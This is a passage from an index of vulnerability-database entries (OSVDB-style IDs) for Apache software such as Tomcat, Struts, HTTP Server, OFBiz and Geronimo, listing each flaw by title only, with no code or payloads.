8647| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
8648| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
8649| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
8650| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
8651| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
8652| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
8653| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
8654| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
8655| [80300] Apache Wicket wicket:pageMapName Parameter XSS
8656| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
8657| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
8658| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
8659| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
8660| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
8661| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
8662| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
8663| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
8664| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
8665| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
8666| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
8667| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
8668| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
8669| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
8670| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
8671| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
8672| [78331] Apache Tomcat Request Object Recycling Information Disclosure
8673| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
8674| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
8675| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
8676| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
8677| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
8678| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
8679| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
8680| [77593] Apache Struts Conversion Error OGNL Expression Injection
8681| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
8682| [77444] Apache HTTP Server mod_proxy Module Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
8683| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
8684| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
8685| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
8686| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
8687| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
8688| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
8689| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
8690| [76079] Apache HTTP Server mod_proxy Module Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
8691| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
8692| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
8693| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
8694| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
| [59019] Apache mod_python Cookie Salting Weakness
| [59018] Apache Harmony Error Message Handling Overflow
| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
| [59010] Apache Solr get-file.jsp XSS
| [59009] Apache Solr action.jsp XSS
| [59008] Apache Solr analysis.jsp XSS
| [59007] Apache Solr schema.jsp Multiple Parameter XSS
| [59006] Apache Beehive select / checkbox Tag XSS
| [59005] Apache Beehive jpfScopeID Global Parameter XSS
| [59004] Apache Beehive Error Message XSS
| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
| [59002] Apache Jetspeed default-page.psml URI XSS
| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
| [59000] Apache CXF Unsigned Message Policy Bypass
| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
| [58993] Apache Hadoop browseBlock.jsp XSS
| [58991] Apache Hadoop browseDirectory.jsp XSS
| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
